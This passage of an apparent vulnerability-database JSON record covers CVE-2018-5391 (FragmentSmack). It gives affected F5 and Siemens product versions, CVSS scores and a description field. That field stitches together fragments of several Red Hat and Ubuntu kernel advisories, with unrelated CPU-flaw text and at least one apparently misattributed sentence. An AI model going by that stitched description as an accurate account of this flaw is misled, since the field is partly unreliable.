                "versionEndExcluding": "13.1.3",
                "versionStartIncluding": "13.0.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "12.1.5",
                "versionStartIncluding": "12.1.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:f5:big-ip_local_traffic_manager:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "11.6.5.1",
                "versionStartIncluding": "11.5.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:ruggedcom_rm1224_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "6.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:ruggedcom_rm1224:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:ruggedcom_rox_ii_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.13.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:ruggedcom_rox_ii:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_m-800_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "6.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_m-800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_s615_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "6.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_s615:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_sc-600_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_sc-600:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w1700_ieee_802.11ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w1700_ieee_802.11ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:scalance_w700_ieee_802.11a\\/b\\/g\\/n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "6.4",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:scalance_w700_ieee_802.11a\\/b\\/g\\/n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1242-7_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1242-7:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1243-1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1243-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1243-7_lte_eu_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1243-7_lte_eu:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1243-7_lte_us_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1243-7_lte_us:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1243-8_irc_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1243-8_irc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1542sp-1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1542sp-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1542sp-1_irc_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1542sp-1_irc:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1543-1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.2",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1543-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_net_cp_1543sp-1_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_net_cp_1543sp-1:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_rf185c_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_rf185c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_rf186c_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_rf186c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_rf186ci_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_rf186ci:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_rf188_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_rf188:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:simatic_rf188ci_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.3",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:simatic_rf188ci:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:siemens:sinema_remote_connect_server_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "2.0.1",
                    "versionStartIncluding": "1.1",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:siemens:sinema_remote_connect_server:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "150070"
      },
      {
        "db": "PACKETSTORM",
        "id": "150057"
      },
      {
        "db": "PACKETSTORM",
        "id": "149832"
      },
      {
        "db": "PACKETSTORM",
        "id": "150315"
      },
      {
        "db": "PACKETSTORM",
        "id": "150191"
      },
      {
        "db": "PACKETSTORM",
        "id": "150314"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2018-5391",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-135422",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2018-5391",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "HIGH",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-5391",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201808-570",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-135422",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-5391",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-135422"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-5391"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201808-570"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-5391"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size. Linux Kernel is prone to a remote denial-of-service vulnerability. \nAn attacker can exploit this issue to cause a denial-of-service condition. 7) - aarch64, noarch, ppc64le\n\n3. \n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load \u0026 Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor\u0027s data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. Maintaining the denial of service\ncondition requires continuous two-way TCP sessions to a reachable open\nport, thus the attacks cannot be performed using spoofed IP addresses. (CVE-2018-5391)\n\nSpace precludes documenting all of the security fixes in this advisory. \n1623067 - CVE-2018-9363 kernel: Buffer overflow in hidp_process_report\n1629636 - CVE-2018-14641 kernel: a bug in ip_frag_reasm() can cause a crash in ip_do_fragment()\n\n6. =========================================================================\nUbuntu Security Notice USN-3742-2\nAugust 14, 2018\n\nlinux-lts-trusty vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 for Ubuntu\n12.04 ESM. \n\nIt was discovered that memory present in the L1 data cache of an Intel CPU\ncore may be exposed to a malicious process that is executing on the CPU\ncore. This vulnerability is also known as L1 Terminal Fault (L1TF). A local\nattacker in a guest virtual machine could use this to expose sensitive\ninformation (memory from other guests or the host OS). (CVE-2018-3646)\n\nIt was discovered that memory present in the L1 data cache of an Intel CPU\ncore may be exposed to a malicious process that is executing on the CPU\ncore. This vulnerability is also known as L1 Terminal Fault (L1TF). A local\nattacker could use this to expose sensitive information (memory from the\nkernel or other processes). (CVE-2018-3620)\n\nAndrey Konovalov discovered an out-of-bounds read in the POSIX timers\nsubsystem in the Linux kernel. (CVE-2018-5390)\n\nJuha-Matti Tilli discovered that the IP implementation in the Linux kernel\nperformed algorithmically expensive operations in some situations when\nhandling incoming packet fragments. (CVE-2018-5391)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 ESM:\n  linux-image-3.13.0-155-generic  3.13.0-155.206~precise1\n  linux-image-3.13.0-155-generic-lpae  3.13.0-155.206~precise1\n  linux-image-generic-lpae-lts-trusty  3.13.0.155.145\n  linux-image-generic-lts-trusty  3.13.0.155.145\n\nPlease note that the recommended mitigation for CVE-2018-3646 involves\nupdating processor microcode in addition to updating the kernel;\nhowever, the kernel includes a fallback for processors that have not\nreceived microcode updates. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 6.7) - i386, ppc64, s390x, x86_64\n\n3. \n\nBug Fix(es):\n\n* Previously, the kernel source code lacked support to report the\nSpeculative Store Bypass Disable (SSBD) vulnerability status on IBM Power\nSystems. As a consequence, the\n/sys/devices/system/cpu/vulnerabilities/spec_store_bypass file incorrectly\nreported \"Not affected\". This fix updates the kernel source code to\nproperly report the SSBD status either as \"Vulnerable\" or \"Mitigation:\nKernel entry/exit barrier (TYPE)\", where TYPE is one of \"eieio\", \"hwsync\",\n\"fallback\", or \"unknown\". (BZ#1615873)\n\n* After updating the system to prevent the L1 Terminal Fault (L1TF)\nvulnerability, only one thread was detected on systems that offer\nprocessing of two threads on a single processor core. With this update, the\n\"__max_smt_threads()\" function has been fixed. (BZ#1629634)\n\n4. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2018:3590-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2018:3590\nIssue date:        2018-11-13\nCVE Names:         CVE-2017-18344 CVE-2018-5391 CVE-2018-10675 \n                   CVE-2018-14634 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel is now available for Red Hat Enterprise Linux 7.2\nAdvanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update\nSupport, and Red Hat Enterprise Linux 7.2 Update Services for SAP\nSolutions. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server Optional E4S (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server Optional TUS (v. 7.2) - x86_64\nRed Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64\n\n3. Description:\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system. \n\nSecurity Fix(es):\n\n* A flaw named FragmentSmack was found in the way the Linux kernel handled\nreassembly of fragmented IPv4 and IPv6 packets. (CVE-2018-5391)\n\n* kernel: out-of-bounds access in the show_timer function in\nkernel/time/posix-timers.c (CVE-2017-18344)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS\nor other unspecified impact (CVE-2018-10675)\n\n* kernel: Integer overflow in Linux\u0027s create_elf_tables function\n(CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Juha-Matti Tilli (Aalto University - Department\nof Communications and Networking and Nokia Bell Labs) for reporting\nCVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634. \n\nBug Fix(es):\n\n* Previously, a kernel panic occurred when the kernel tried to make an out\nof bound access to the array that describes the L1 Terminal Fault (L1TF)\nmitigation state on systems without Extended Page Tables (EPT) support. \nThis update extends the array of mitigation states to cover all the states,\nwhich effectively prevents out of bound array access. Also, this update\nenables rejecting invalid, irrelevant values, that might be erroneously\nprovided by the userspace. As a result, the kernel no longer panics in the\ndescribed scenario. (BZ#1629565)\n\n* Previously, a packet was missing the User Datagram Protocol (UDP) payload\nchecksum during a full checksum computation, if the hardware checksum was\nnot applied. As a consequence, a packet with an incorrect checksum was\ndropped by a peer. With this update, the kernel includes the UDP payload\nchecksum during the full checksum computation. As a result, the checksum is\ncomputed correctly and the packet can be received by the peer. (BZ#1635792)\n\n* Previously, a transform lookup through the xfrm framework could be\nperformed on an already transformed destination cache entry (dst_entry). \nWhen using User Datagram Protocol (UDP) over IPv6 with a connected socket\nin conjunction with Internet Protocol Security (IPsec) in Encapsulating\nSecurity Payload (ESP) transport mode. As a consequence, invalid IPv6\nfragments transmitted from the host or the kernel occasionally terminated\nunexpectedly due to a socket buffer (SKB) underrun. With this update, the\nxfrm lookup on an already transformed dst_entry is not possible. As a\nresult, using UDP iperf utility over IPv6 ESP no longer causes invalid IPv6\nfragment transmissions or a kernel panic. (BZ#1639586)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact\n1609664 - CVE-2018-5391 kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack)\n1610958 - CVE-2017-18344 kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c\n1624498 - CVE-2018-14634 kernel: Integer overflow in Linux\u0027s create_elf_tables function\n\n6. Package List:\n\nRed Hat Enterprise Linux Server AUS (v. 7.2):\n\nSource:\nkernel-3.10.0-327.76.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.76.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm\nperf-3.10.0-327.76.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-3.10.0-327.76.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server E4S (v. 